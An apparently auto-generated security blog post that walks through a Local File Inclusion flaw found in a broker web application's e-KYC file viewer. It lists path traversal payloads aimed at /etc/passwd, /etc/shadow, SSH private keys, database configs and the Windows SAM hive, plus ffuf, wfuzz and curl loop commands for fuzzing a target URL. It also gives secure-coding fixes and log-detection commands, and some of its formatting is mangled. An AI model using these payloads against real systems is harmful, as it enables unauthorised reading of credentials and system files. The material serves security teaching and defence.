Listen to this Post
Introduction:
Local File Inclusion (LFI) vulnerabilities remain a pervasive and high-severity threat in web application security. These flaws allow attackers to read sensitive files on a server, potentially leading to full system compromise. This article dissects a real-world LFI discovery in a broker web application, demonstrating how a seemingly secure image upload feature became a gateway to exposing critical system data.
Learning Objectives:
- Understand the fundamental mechanics of Local File Inclusion and Path Traversal vulnerabilities.
- Learn a systematic methodology for identifying and exploiting LFI vulnerabilities in web applications.
- Implement robust mitigation strategies to secure file inclusion functionalities in your own applications.
You Should Know:
1. The Anatomy of an LFI Vulnerability
Local File Inclusion occurs when a web application insecurely incorporates files from the server’s file system. Unlike Remote File Inclusion (RFI), LFI focuses on accessing local files through improper input validation. The vulnerability typically manifests in parameters that control file paths, such as the `req` parameter discovered in the broker application. When user input is not properly sanitized, attackers can manipulate these parameters using directory traversal sequences (../) to escape the intended directory and access arbitrary files. This fundamental security flaw transforms a benign file viewer into a powerful data exfiltration tool.
Step-by-step guide explaining what this does and how to use it:
– Identify file inclusion parameters in URLs (e.g., ?file=, ?page=, ?req=)
– Test basic traversal: `../../../etc/passwd`
– Observe server responses for error messages or file content
– Escalate by accessing sensitive files like /etc/shadow, configuration files, or application source code
2. Reconnaissance and Application Mapping
Before exploitation comes thorough reconnaissance. The initial phase involves mapping the application’s functionality to identify potential attack vectors. In this case, the e-KYC section’s image upload feature presented the perfect entry point. Comprehensive application crawling reveals endpoints that handle file operations, particularly those that accept user-controlled parameters for file retrieval. Understanding the application’s directory structure is crucial for effective traversal attempts.
Step-by-step guide explaining what this does and how to use it:
– Use automated scanners like Burp Suite or OWASP ZAP to crawl the application
– Manually explore all application features, especially file upload/download functionality
– Intercept requests with a proxy to identify parameters passed to the server
– Document all endpoints that handle file operations for targeted testing
3. Crafting Effective Path Traversal Payloads
Successful LFI exploitation requires precise payload construction. The initial failure with `../etc/passwd` demonstrates the importance of understanding the application’s current directory context. The successful payload `../../../../../etc/passwd` used multiple traversal sequences to navigate from the upload directory to the root filesystem. Different operating systems and application configurations require tailored payloads, including URL encoding, absolute path references, and null byte injection in legacy systems.
Step-by-step guide explaining what this does and how to use it:
– Start with basic traversal: `../../../etc/passwd`
– Increment traversal depth: `../../../../../../etc/passwd`
– URL encode special characters: `..%2f..%2f..%2fetc%2fpasswd`
– Try absolute paths: `/etc/passwd`
– For Windows systems: `..\..\..\windows\system32\drivers\etc\hosts`
4. Advanced LFI Exploitation Techniques
Beyond reading basic system files, LFI can be leveraged for more sophisticated attacks. When file upload functionality exists alongside LFI, attackers can upload malicious files and then include them to achieve remote code execution. Even without upload capabilities, LFI can expose application source code, configuration files containing database credentials, and log files that might be poisoned to execute commands.
Step-by-step guide explaining what this does and how to use it:
– Access application configuration files: `../../../../application/config/database.php`
– Read web server logs: `../../../../var/log/apache2/access.log`
– Retrieve PHP session files: `../../../../tmp/sess_
`
- Access SSH keys: `../../../../.ssh/id_rsa`
- Read Windows registry hives: `..\..\..\windows\system32\config\sam`
<h2 style="color: yellow;">5. Automated LFI Testing with Command-Line Tools</h2>
While manual testing is essential, automation can enhance efficiency and coverage. Tools like ffuf and wfuzz can systematically test for LFI vulnerabilities by fuzzing parameters with extensive payload lists. Custom scripts can automate the process of testing various traversal depths and encoding techniques across multiple parameters simultaneously.
<h2 style="color: yellow;">Linux commands for automated testing:</h2>
[bash]
Using ffuf to fuzz for LFI
ffuf -u "https://target.com/e-kyc/file/view/?req=FUZZ" -w lfi-payloads.txt -fs 0
Using wfuzz with multiple encoding techniques
wfuzz -z file,traversal_payloads.txt --hc 404 https://target.com/e-kyc/file/view/?req=FUZZ
Custom curl script for testing multiple depths
for i in {1..10}; do
payload=$(printf '../%.0s' $(seq 1 $i))"etc/passwd"
curl -s "https://target.com/e-kyc/file/view/?req=$payload" | grep -q "root:" && echo "Vulnerable with depth $i"
done
6. Secure Coding Practices to Prevent LFI
Mitigating LFI vulnerabilities requires a multi-layered approach to input validation and file access control. Applications should implement whitelist-based validation for allowed files, avoid direct user input in file paths, and utilize indirect resource mapping. Proper server hardening, including running applications with minimal privileges and implementing strict directory permissions, provides additional protection layers.
Implementation examples:
// Secure PHP implementation - whitelist approach
$allowed_files = array('profile.jpg', 'document.pdf', 'contract.docx');
$requested_file = $_GET['req'];
if (in_array($requested_file, $allowed_files)) {
include('/secure/uploads/path/' . basename($requested_file));
} else {
die('Invalid file request');
}
// Secure Java implementation - resource mapping
Map<String, String> fileMap = new HashMap<>();
fileMap.put("profile", "/uploads/profile.jpg");
fileMap.put("document", "/uploads/document.pdf");
String fileKey = request.getParameter("req");
String filePath = fileMap.get(fileKey);
if (filePath != null) {
Files.copy(Paths.get(filePath), response.getOutputStream());
}
7. Detection and Monitoring for LFI Attacks
Proactive security monitoring can detect LFI attempts before they cause damage. Web application firewalls (WAFs) should be configured with rules to detect traversal sequences in URLs and parameters. Server access logs should be monitored for patterns indicating LFI probes, and file integrity monitoring should alert on unauthorized access to sensitive system files.
Linux commands for log monitoring:
Search Apache logs for traversal attempts grep -E "../%2e%2e|../|..\" /var/log/apache2/access.log Monitor for access to sensitive files auditctl -w /etc/passwd -p r -k sensitive_file_access auditctl -w /etc/shadow -p r -k sensitive_file_access Real-time alerting for LFI patterns tail -f /var/log/nginx/access.log | grep --line-buffered "../" | while read line; do echo "LFI Attempt: $line" | mail -s "LFI Alert" [email protected] done
What Undercode Say:
- The line between Path Traversal and LFI is often blurred, but both demonstrate critical input validation failures that demand immediate remediation.
- This case study exemplifies how proper security testing methodology transforms seemingly minor findings into significant security discoveries with substantial impact potential.
The discovery detailed in the original post, while correctly identified as a Path Traversal vulnerability that enabled Local File Inclusion, highlights a fundamental security testing truth: persistence and methodology trump isolated technical knowledge. The researcher’s systematic approach—from initial reconnaissance through incremental exploitation—demonstrates the mindset required for effective security assessment. The debate in the comments regarding vulnerability classification, while academically interesting, misses the larger point: regardless of terminology, the vulnerability exposed sensitive system information through improper input validation. This case reinforces that security controls must be defense-in-depth, combining proper input validation, least privilege access, and continuous monitoring. Organizations should prioritize training developers on secure coding practices while implementing robust security testing throughout the development lifecycle.
Prediction:
The sophistication of LFI exploitation will continue evolving, with increased automation and integration into attack toolkits making these vulnerabilities more dangerous. As applications migrate to cloud-native architectures and containerized environments, LFI flaws may provide initial footholds that enable lateral movement across distributed systems. The growing adoption of serverless computing and microservices architectures introduces new attack surfaces where traditional LFI mitigation strategies may prove insufficient. Future LFI attacks will likely combine with other vulnerabilities to create attack chains that bypass individual security controls, emphasizing the need for comprehensive security testing and runtime protection across entire application ecosystems.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Sachin Mishra29 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
